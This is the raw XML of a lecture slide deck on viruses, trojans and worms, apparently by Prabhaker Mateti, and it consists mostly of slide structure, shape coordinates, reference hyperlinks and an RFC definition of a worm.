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69" r:id="rId2"/>
    <p:sldId id="344" r:id="rId3"/>
    <p:sldId id="347" r:id="rId4"/>
    <p:sldId id="345" r:id="rId5"/>
    <p:sldId id="317" r:id="rId6"/>
    <p:sldId id="346" r:id="rId7"/>
    <p:sldId id="342" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="315" r:id="rId12"/>
    <p:sldId id="316" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="320" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="340" r:id="rId22"/>
    <p:sldId id="319" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="285" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="321" r:id="rId29"/>
    <p:sldId id="326" r:id="rId30"/>
    <p:sldId id="327" r:id="rId31"/>
    <p:sldId id="276" r:id="rId32"/>
    <p:sldId id="310" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="302" r:id="rId35"/>
    <p:sldId id="303" r:id="rId36"/>
    <p:sldId id="339" r:id="rId37"/>
    <p:sldId id="348" r:id="rId38"/>
    <p:sldId id="324" r:id="rId39"/>
    <p:sldId id="322" r:id="rId40"/>
    <p:sldId id="323" r:id="rId41"/>
    <p:sldId id="349" r:id="rId42"/>
    <p:sldId id="330" r:id="rId43"/>
    <p:sldId id="328" r:id="rId44"/>
    <p:sldId id="329" r:id="rId45"/>
    <p:sldId id="311" r:id="rId46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2" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="-114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F170451-2E46-4030-9766-3511F49094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081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6900"/>
            <a:ext cx="55943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0813" y="881380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863E60-1896-4AE3-9948-8775554455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63E60-1896-4AE3-9948-8775554455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150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04F761D-B8BA-4D57-B0DC-CB307DF9FA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D1F50-A6F3-4E31-B005-6A7D1B69D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680F6-B95F-4C41-9624-C0A628801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51EFC5-E616-4B9F-95D6-4CF76CF1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C018CA-7079-45BF-9010-1711F36D6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78A876E-81C9-4275-AA4F-CD7042BA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7DB08-015C-4C5E-A67B-28B2F6919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9054D-1772-45AB-B303-ECAB44F761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90A3B-7504-4FA0-A360-2C44BF4FCA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35C47-2183-498B-9A39-1EA5613908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D741D-B4DA-4959-B6A9-3F6A3A33A1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C43B3-BADE-4B34-BA72-E18749546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223C-98B2-4092-AD89-00278EA55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9DCC8-5AC3-4505-87A3-E65326D1ED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048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r>
              <a:rPr lang="en-US"/>
              <a:t>Mateti, Viruses, Trojans and Worms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204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E532D57-5E6A-4C6A-A031-D73BD4E9E9D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rfc/rfc4949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mcafee.com/VirusInfo/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.virusbt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ldlist.org/WildList/201004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rris_wor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analysis.com/article.php?id=217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erlink.com/content/f13m405335g40132/?p=5097e4a05ec64f45a47d1c345c9d4e12&amp;pi=5" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.springerlink.com/content/w423l0q5m04j5225/?p=2a4a9713486b4fecbad877abfce68a9f&amp;pi=2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.springerlink.com/content/x5373l5445477225/?p=5097e4a05ec64f45a47d1c345c9d4e12&amp;p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erlink.com/content/y24724w25118n884/?p=2a4a9713486b4fecbad877abfce68a9f&amp;pi=5" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.springerlink.com/content/n352117u03115021/?p=18ea1a7d3ec54d519ce9a9dbc42542d0&amp;pi=4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.springerlink.com/content/65137221472m6w28/?p=e98e0cf1462744008953b6b54120f252&amp;pi=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hl=en&amp;q=Linux+Virus+Writing+HOWTO+&amp;btnG=Searc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economics.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.computerworld.com/securitytopics/security/story/0,10801,89138,00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o2010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ogle.com/books?hl=en&amp;lr=&amp;id=jp0EsbjUKKQC&amp;oi=fnd&amp;pg=PA190&amp;dq=virus+scanning&amp;ots=b-1p9dmRjb&amp;sig=LyUpVXrkfnPl7zmhLBaKZe8DvPo" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_html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right.edu/~pmateti/InternetSecurity/Lectures/Viruses/virusScanner.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.commandcom.com/virus/tren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ns.org/reading_room/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.research.ibm.com/antivirus/SciPapers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rfc/rfc4949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Viruses, Trojans, and Worms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Prabhaker Mateti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7F40-41A0-4DBA-BCDF-B6898040C758}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10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worm propagates between systems.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It does not “reproduce” or infect.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Definition from RFC 1135: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC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 program that can run independently, will consume the resources of its host [machine] from within in order to maintain itself and can propagate a complete working version of itself on to other machines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Security Glossary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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.rfc-editor.org/rfc/rfc4949.txt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 rot="-1262131">
            <a:off x="5638800" y="457200"/>
            <a:ext cx="2706688" cy="914400"/>
            <a:chOff x="4186" y="1504"/>
            <a:chExt cx="1271" cy="489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26629" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4186" y="1504"/>
              <a:ext cx="1271" cy="489"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="321" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="142" y="73"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="141"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="9" y="244"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="354"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="30" y="455"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="93" y="529"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="577"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="306" y="605"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="418" y="632"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="515" y="662"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="604" y="727"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="667" y="828"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="777" y="930"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="855" y="967"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="935" y="976"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1009" y="955"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1098" y="889"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1203" y="793"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1302" y="727"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1418" y="729"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1543" y="792"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1617" y="824"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1697" y="847"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1775" y="852"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1866" y="830"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1944" y="733"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2011" y="636"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2102" y="624"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2218" y="664"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2334" y="658"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2433" y="580"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2501" y="466"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2535" y="343"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2537" y="223"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2503" y="126"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2421" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2324" y="67"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2229" y="141"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2153" y="191"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2053" y="152"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1973" y="141"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1883" y="154"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1786" y="213"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1703" y="301"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1604" y="308"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1522" y="274"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1437" y="229"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1349" y="192"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1262" y="189"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1180" y="215"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1106" y="265"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1000" y="346"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="891" y="385"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="821" y="326"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="773" y="217"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="720" y="111"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="621" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="534" y="17"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="429" y="0"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2541" h="978">
                  <a:moveTo>
                    <a:pt x="418" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="244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4" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="289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0" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336" y="613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344" y="615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367" y="618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382" y="622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395" y="626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403" y="628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418" y="632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426" y="632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433" y="636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439" y="638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447" y="639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481" y="649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498" y="655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504" y="658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509" y="660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515" y="662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519" y="664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530" y="668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538" y="674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547" y="677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555" y="681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562" y="687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574" y="696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580" y="700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589" y="710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595" y="715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612" y="736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619" y="748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621" y="754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625" y="759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652" y="803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656" y="811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661" y="820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667" y="828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675" y="837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680" y="845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696" y="862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703" y="871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713" y="879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739" y="902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747" y="909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756" y="917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768" y="923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773" y="927"/>
